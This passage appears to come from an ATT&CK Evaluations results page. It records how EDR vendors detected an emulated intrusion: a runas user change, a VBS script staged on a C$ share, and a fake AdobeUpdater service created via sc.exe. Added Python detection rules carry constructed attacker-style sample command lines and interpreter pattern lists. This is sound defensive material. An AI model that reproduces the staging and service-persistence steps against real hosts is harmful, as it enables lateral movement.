Telemetry showed cmd.exe execution and associated user context change (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3]
FireEye
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs with a parent process of powershell.exe. [1] [2]
Enrichment
The capability enriched cmd.exe spawning wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). Alert details showed that the context of the user was changed to Kmitnick. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2]
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs through wscript.exe, and the associated user context change between user Bob and user Kmitnick. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed svchost.exe creating cmd.exe, which ran autoupdate.vbs as user Kmitnick (tainted by the parent "Powershell executed remote commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched wscript.exe executing autoupdate.vbs with the correct ATT&CK Tactic (Execution) and Technique (Command Line Interface). [1] [2]
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs as user Kmitnick. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs via wscript.exe as user Kmitnick. The execution generated three new PowerShell related alerts for the initial execution sequence of Empire that tainted this event, but were not counted as separate detections for this technique. [1] [2] [3] [4]
Palo Alto Networks
Enrichment
The capability enriched wscript.exe executing autoupdate.vbs with a related ATT&CK Technique (Scripting). [1] [2] [3]
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying PowerShell Empire using the Runas functionality. [1] [2] [3]
RSA
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs via wscript.exe as user Kmitnick. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe execution of autoupdate.vbs. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry showed file modification events for the creation of, and writes to, update.vbs on remote host 10.0.0.4 (Creeper). [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry showed update.vbs written to the C$ remote share on host 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed file events for the write of update.vbs to Creeper (10.0.0.4). The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry
Telemetry for file creation events was available and would show the creation of update.vbs. No screenshot for the event was made available, though other file creation events, as well as the subsequent execution of update.vbs, were identified. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the autoupdate.vbs script being written to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched powershell.exe writing update.vbs with an alert for File Write to Network Share (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed the file creation of update.vbs. [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability enriched the update.vbs creation event with the condition "File created on hidden share (C$)". The enrichment was tainted by parent "Powershell executed remote commands" alerts. The condition contributing to enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Command and Control) and Technique (Remote File Copy) and a suspicious indicator that a file was copied to a remote computer via PowerShell. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the creation of update.vbs on Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed creation of update.vbs on 10.0.0.4 (Creeper) and the remote file copy action from 10.0.1.5 (CodeRed) (the remote file copy event on CodeRed was tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry
Telemetry showed file create and write events for update.vbs. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script being modified/moved to a remote location. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed creation of update.vbs on 10.0.0.4 (Creeper). The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
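The three preceding procedures chain together: powershell.exe writes autoupdate.vbs, cmd.exe runs it through wscript.exe with the user context changing from Bob to Kmitnick, and update.vbs is then copied into \\Creeper\C$. The following is an added example, not code from this page or from any vendor on it: Python rules over constructed file-create and process-create events that flag a shell writing a script file, a write into a remote administrative share, a process whose user differs from its parent's, and execution of a script the shell staged earlier. The event field names (type, ts, host, image, user, path, cmdline, parent_image, parent_user) are assumptions in the spirit of Sysmon Event IDs 11 and 1; the paths, the user Alice and the benign events are constructed, while hostnames, script names and the Bob-to-Kmitnick change follow the entries above.

```python
"""Rules for scripts staged by a shell, written to an admin share, and executed under a changed
user context, over constructed events (added example, not code from the ATT&CK Evaluations page
or any vendor on it). Event fields are assumptions modelled on Sysmon Event IDs 11 (file create)
and 1 (process create); paths, the user Alice and the benign events are constructed."""
import ntpath
import re

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
ADMIN_SHARE_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>(?:[A-Za-z]|ADMIN)\$)\\", re.IGNORECASE)


def classify_path(path):
    """Basename, script-ness and, for UNC paths, the remote host and administrative share."""
    ext = ntpath.splitext(path)[1].lower()
    m = ADMIN_SHARE_RE.match(path)
    return {"name": ntpath.basename(path).lower(), "is_script": ext in SCRIPT_EXTS,
            "remote_host": m.group("host") if m else None,
            "share": m.group("share").upper() if m else None}


def script_tokens(cmdline):
    """Script paths referenced on a command line, whether double-quoted or bare."""
    out = []
    for tok in re.findall(r'"[^"]+"|\S+', cmdline):
        tok = tok.strip('"')
        if ntpath.splitext(tok)[1].lower() in SCRIPT_EXTS:
            out.append(tok)
    return out


def analyse(events):
    """Return alerts; events are processed in time order so that staging precedes execution.
    `staged` maps a script basename to the time a shell wrote it. Keying on basename alone
    (not host) is deliberate: update.vbs is written from CodeRed into Creeper's C$ share."""
    alerts, staged = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        base = {"ts": ev["ts"], "host": ev["host"], "image": ev["image"], "user": ev["user"]}
        if ev["type"] == "file":
            info = classify_path(ev["path"])
            if info["is_script"] and ev["image"].lower() in SHELL_IMAGES:
                staged[info["name"]] = ev["ts"]
                alerts.append(dict(base, rule="shell_wrote_script", path=ev["path"]))
            if info["remote_host"]:
                alerts.append(dict(base, rule="write_to_admin_share", target=info["remote_host"],
                                   share=info["share"], path=ev["path"]))
        elif ev["type"] == "process":
            scripts = script_tokens(ev["cmdline"])
            if not scripts:
                continue
            parent_user = ev.get("parent_user", ev["user"])
            if ev["user"].lower() != parent_user.lower():          # runas-style context change
                alerts.append(dict(base, rule="user_context_change", parent=ev["parent_image"],
                                   parent_user=parent_user, script=scripts[0]))
            for s in scripts:
                name = ntpath.basename(s).lower()
                if name in staged:
                    alerts.append(dict(base, rule="staged_script_executed", script=s,
                                       staged_ts=staged[name]))
    return alerts


SAMPLE_EVENTS = [   # constructed sample mirroring the three procedures above
    {"type": "file", "ts": 5, "host": "CodeRed", "image": "notepad.exe", "user": "Bob",
     "path": r"C:\Users\Bob\notes.txt"},                                    # benign, no alert
    {"type": "file", "ts": 10, "host": "CodeRed", "image": "powershell.exe", "user": "Bob",
     "path": r"C:\Windows\Temp\autoupdate.vbs"},
    {"type": "process", "ts": 20, "host": "CodeRed", "image": "cmd.exe", "user": "Kmitnick",
     "parent_image": "powershell.exe", "parent_user": "Bob",
     "cmdline": r"cmd.exe /c C:\Windows\Temp\autoupdate.vbs"},
    {"type": "process", "ts": 21, "host": "CodeRed", "image": "wscript.exe", "user": "Kmitnick",
     "parent_image": "cmd.exe", "parent_user": "Kmitnick",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\autoupdate.vbs"'},
    {"type": "file", "ts": 60, "host": "CodeRed", "image": "powershell.exe", "user": "Kmitnick",
     "path": r"\\10.0.0.4\C$\Windows\Temp\update.vbs"},
    {"type": "process", "ts": 70, "host": "Creeper", "image": "wscript.exe", "user": "Alice",
     "parent_image": "explorer.exe", "parent_user": "Alice",
     "cmdline": r"wscript.exe C:\Users\Alice\logon.vbs"},                  # benign logon script
]
```

The last event shows why the rules are scoped the way they are: a logon script run by explorer.exe under the same user produces nothing, while the same script host run under a different user than its parent, or running a file a shell wrote minutes earlier, produces an alert that can be tied back to the staging write.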
Carbon Black
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to remotely query services on Creeper. Telemetry also showed module loads and a network connection to Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched the sc.exe execution with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query services on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because the user Bob was querying for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed sc.exe execution with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showed sc.exe execution to query services on Creeper. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed powershell.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing sc.exe to remotely query services on Creeper and enriched sc.exe with the condition "SC Query Reconnaissance Command". The enrichment was tainted by the parent "Powershell executed remote commands" alert. The capability was modified after the start of the evaluation to allow the condition contributing to Enrichment to appear, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe command remotely querying services on Creeper (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Tainted)
A General Behavior alert was generated for the sc utility being used to perform actions on remote services. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed execution of sc.exe to query services on 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query services on Creeper. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
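Several entries above describe telemetry as "tainted" because the process descends from one that already carries an alert (F-Secure tags the spawned sc process because its parent powershell.exe has a detection; CrowdStrike's process tree marks sc.exe as tainted by a previous powershell.exe detection). The following is an added example of that parent-process taint propagation, written for this page rather than taken from the evaluation or any vendor's product. Hosts, PIDs and command lines are constructed samples; the alerted PID 300 stands in for whatever PowerShell analytic fired first.

```python
"""Parent-process taint propagation over constructed process-creation events.

Added example, not part of the evaluation page or any vendor's product. An
event inherits taint from the nearest ancestor process that already carries
an alert. Hosts, PIDs and command lines below are constructed samples.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Optional, Set, Tuple

ProcKey = Tuple[str, int]  # (host, pid); PIDs are only unique per host


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample: powershell.exe on CodeRed (pid 300) spawns sc.exe and
# reg.exe; notepad.exe shares the same parent but is not a descendant of the
# alerted process. cmd.exe on Creeper is a child of services.exe (pid 600, not
# in the feed), which is how a remotely started service appears on that host.
SAMPLE_EVENTS = [
    ProcEvent("CodeRed", 100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent("CodeRed", 300, 100, "powershell.exe", "powershell.exe -NoProfile"),
    ProcEvent("CodeRed", 400, 300, "sc.exe",         r"sc.exe \\Creeper query"),
    ProcEvent("CodeRed", 401, 300, "sc.exe",         r"sc.exe \\Creeper qc AdobeUpdater"),
    ProcEvent("CodeRed", 402, 300, "reg.exe",        r"reg.exe query HKLM\SYSTEM\CurrentControlSet\Control"),
    ProcEvent("CodeRed", 403, 402, "findstr.exe",    "findstr.exe /i deny"),  # grandchild of the alert
    ProcEvent("CodeRed", 500, 100, "notepad.exe",    "notepad.exe"),
    ProcEvent("Creeper", 700, 600, "cmd.exe",        "cmd.exe /c update.vbs"),
]

# The alert an analytic already raised (e.g. "PowerShell with unusual arguments").
ALERTED: Set[ProcKey] = {("CodeRed", 300)}


def index_events(events: Iterable[ProcEvent]) -> Dict[ProcKey, ProcEvent]:
    return {(e.host, e.pid): e for e in events}


def nearest_alerted_ancestor(event: ProcEvent, by_key: Dict[ProcKey, ProcEvent],
                             alerted: Set[ProcKey]) -> Optional[ProcEvent]:
    """Walk the parent chain on the same host; return the closest alerted ancestor, if any."""
    seen: Set[ProcKey] = set()
    current = event
    while True:
        parent_key = (current.host, current.ppid)
        parent = by_key.get(parent_key)
        if parent is None or parent_key in seen:  # reached the root, or a PID-reuse loop
            return None
        seen.add(parent_key)
        if parent_key in alerted:
            return parent
        current = parent


def classify(events: Iterable[ProcEvent], alerted: Set[ProcKey]) -> Dict[ProcKey, Tuple[str, Optional[int]]]:
    """Label every event 'alert', 'tainted' (with the tainting ancestor's PID) or 'clean'."""
    events = list(events)
    by_key = index_events(events)
    labels: Dict[ProcKey, Tuple[str, Optional[int]]] = {}
    for e in events:
        key = (e.host, e.pid)
        if key in alerted:
            labels[key] = ("alert", None)
            continue
        ancestor = nearest_alerted_ancestor(e, by_key, alerted)
        labels[key] = ("tainted", ancestor.pid) if ancestor else ("clean", None)
    return labels


if __name__ == "__main__":
    for (host, pid), (label, by) in classify(SAMPLE_EVENTS, ALERTED).items():
        print(f"{host}:{pid:<4} {label:8}" + (f" (by pid {by})" if by else ""))
```

Note that cmd.exe on Creeper stays clean: parent/child taint does not cross hosts, because the sc.exe that started the service is not its parent. Linking the two sides needs a separate correlation, which is what the SentinelOne story grouping (Group ID) mentioned on this page provides.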
Carbon Black
Specific Behavior
A Specific Behavior alert was generated for sc.exe execution to create the AdobeUpdater service with the correct ATT&CK Technique (New Service). [1] [2]
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to create a new AdobeUpdater service containing a binPath pointed to cmd.exe with arguments to execute update.vbs. [1] [2]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating they observed a General Behavior because a newly created file (AdobeUpdater service in registry) established persistence on the host. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3]
Cybereason
Telemetry
Telemetry showed sc.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for the unconventional creation of a new service with the correct ATT&CK Technique (New Service) and Tactic (Persistence, Privilege Escalation). The alert was tainted by a parent PowerShell alert. [1]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence). The enrichment was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Specific Behavior
A Specific Behavior alert was generated on the AdobeUpdater service named "Persistence-New Service". The alert was also tagged with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence). [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe execution to create the AdobeUpdater service and set the binPath to run cmd.exe with an argument to execute update.vbs. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence). [1] [2] [3]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command creating a new service called adobeupdater on Creeper from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for sc.exe used with parameters typical for lateral movement. [1] [2] [3]
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
Telemetry
Telemetry showed sc.exe execution with command-line arguments. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe to create a new service named AdobeUpdater with binPath pointed to cmd.exe with arguments to run update.vbs and suspicious service description. The telemetry was tainted by the parent "Powershell executed remote commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
Specific Behavior (Configuration Change)
An alert called "Windows Service Registry Key modified" and a Specific Behavior alert called "New Windows service created" were generated due to the AdobeUpdater service being created in the Registry. The capability may have been modified after the start of the evaluation to create these alerts, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched sc.exe with a relevant ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed that a new service was added. Telemetry also showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe execution to remotely create the AdobeUpdater service with a binPath set to run cmd.exe with an argument to execute update.vbs on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper shows the registry keys that were changed to add the new service. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for the suspicious service registration of AdobeUpdater. [1] [2] [3] [4]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a new service created via the command line. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
Enrichment
The capability enriched sc.exe executing with the correct ATT&CK Technique (New Service). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed execution of sc.exe with command-line arguments to create a new AdobeUpdater service containing a binPath pointed to cmd.exe with arguments to execute update.vbs. Telemetry also showed the creation of Registry keys associated with this new service. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed execution of sc.exe to create a new service called AdobeUpdater with a binPath set to run cmd.exe and execute update.vbs. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to create the AdobeUpdater service on Creeper with a binPath pointing to cmd.exe to execute update.vbs. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry within the process trees showed execution of sc.exe with command-line arguments to create the AdobeUpdater service with binPath pointed to cmd.exe with arguments to execute update.vbs and a suspicious service description, which indicates masquerading. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." An analyst could use this information to determine it is not a legitimate service. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
Telemetry (Tainted)
Telemetry showed sc.exe executions to create the AdobeUpdater service and set the binPath to run cmd.exe with an argument to execute update.vbs as well as set the description of the service. An analyst could use this information to determine masquerading occurred. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2] [3]
FireEye
Enrichment
The capability enriched the sc.exe command with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and the correct Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry within the process trees showed execution of sc.exe with command-line arguments to create the AdobeUpdater service with binPath pointed to cmd.exe with arguments to execute update.vbs and a suspicious service description, which could indicate masquerading. [1] [2] [3]
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe to create a new service named AdobeUpdater with binPath pointed to cmd.exe with arguments to run update.vbs and suspicious service description, which could assist an analyst in determining this was not a legitimate Adobe product. The telemetry was tainted by the parent "Powershell executed remote commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe with command-line arguments, to create and configure the AdobeUpdater service, that an analyst could use to determine the service is masquerading. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe service creation command for the AdobeUpdater service with a binPath set to run update.vbs with cmd.exe on startup on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed the sc.exe command to set the service description, but a screenshot was not available. An analyst can use this information to determine AdobeUpdater is masquerading. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed execution of sc.exe with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed execution of sc.exe to create a new service called AdobeUpdater with a binPath set to run cmd.exe and execute update.vbs as well as set the service description. An analyst can use this information to determine the service is masquerading. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed executions of sc.exe to create the AdobeUpdater service on Creeper with a binPath pointing to cmd.exe to execute update.vbs as well as setting the service description. An analyst can use this information to determine AdobeUpdater is masquerading. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
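The two procedures above (creating the AdobeUpdater service with a binPath that runs cmd.exe to execute update.vbs, then setting a service description claiming to be an Adobe updater) are what several vendors surface as telemetry for an analyst to judge. The following is an added example of a command-line analytic that makes that judgement automatically; it is written for this page and is not code from the evaluation or from any vendor. It tags findings with the technique IDs this page uses (T1050 New Service, T1035 Service Execution, T1007 System Service Discovery) and adds T1036 Masquerading for the vendor-name-versus-binPath check the page describes only in prose. The sample command lines, the update.vbs path and the vendor word list are constructed for the example; the real sc.exe syntax (`binPath= value`, with the space after the equals sign) is preserved.

```python
"""sc.exe command-line analytic (added example, not from the page or any vendor).

Parses sc.exe command lines as they appear in process-creation telemetry and
emits (technique, message) findings. Because 'create' and 'description' arrive
as separate events, the detector keeps per-service state so the masquerading
check can fire whichever of the two arrives last.
"""
import re
import shlex
from typing import Dict, List, Optional, Tuple

INTERPRETERS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|ps1|bat|cmd|hta)\b")
VENDOR_WORDS = ("adobe", "microsoft", "google")      # names a fake service might borrow (constructed list)
QUERY_VERBS = ("query", "queryex", "qc", "qdescription", "enumdepend")
Finding = Tuple[str, str]


def _unquote(tok: str) -> str:
    """Strip one pair of surrounding quotes (shlex in non-POSIX mode keeps them)."""
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'" else tok


def parse_sc(cmdline: str) -> Optional[dict]:
    """Split an sc.exe command line into server, verb, service name, 'key= value' options."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # non-POSIX: backslashes stay literal
    except ValueError:                              # unbalanced quote in the command line
        return None
    if not tokens or _unquote(tokens[0]).rsplit("\\", 1)[-1].lower() not in ("sc", "sc.exe"):
        return None
    i, server = 1, None
    if i < len(tokens) and tokens[i].startswith("\\\\"):   # sc \\host verb ...
        server, i = tokens[i][2:], i + 1
    if i >= len(tokens):
        return None
    verb, i = tokens[i].lower(), i + 1
    service = None
    if i < len(tokens) and not tokens[i].endswith("="):
        service, i = _unquote(tokens[i]), i + 1
    opts: Dict[str, str] = {}
    positional: List[str] = []
    while i < len(tokens):
        if tokens[i].endswith("="):                 # sc's "binPath= value" form
            opts[tokens[i][:-1].lower()] = _unquote(tokens[i + 1]) if i + 1 < len(tokens) else ""
            i += 2
        else:
            positional.append(_unquote(tokens[i]))
            i += 1
    return {"server": server, "verb": verb, "service": service, "opts": opts, "positional": positional}


def _launches_interpreter(binpath: str) -> bool:
    low = binpath.lower()
    return any(exe in low for exe in INTERPRETERS) or SCRIPT_EXT_RE.search(low) is not None


def _claims_vendor(service: Optional[str], description: str) -> bool:
    text = f"{service or ''} {description}".lower()
    return any(word in text for word in VENDOR_WORDS)


class ScDetector:
    def __init__(self) -> None:
        self.services: Dict[Tuple[Optional[str], str], Dict[str, str]] = {}

    def process(self, cmdline: str) -> List[Finding]:
        parsed = parse_sc(cmdline)
        if parsed is None:
            return []
        verb, server, service = parsed["verb"], parsed["server"], parsed["service"]
        where = f"on {server}" if server else "locally"
        findings: List[Finding] = [("weak", f"sc.exe executed {where}")]  # cf. "SC Execution (Weak Signal)"
        rec = self.services.setdefault((server, (service or "").lower()), {"binpath": "", "description": ""})
        if verb in QUERY_VERBS:
            findings.append(("T1007", f"service configuration enumerated ({verb}) {where}"))
        elif verb == "create":
            rec["binpath"] = parsed["opts"].get("binpath", "")
            findings.append(("T1050", f"service {service!r} created {where}"))
            if _launches_interpreter(rec["binpath"]):
                findings.append(("T1050", f"binPath runs an interpreter or script: {rec['binpath']}"))
        elif verb == "description":
            rec["description"] = parsed["positional"][0] if parsed["positional"] else ""
        elif verb == "start":
            findings.append(("T1035", f"service {service!r} started {where}"))
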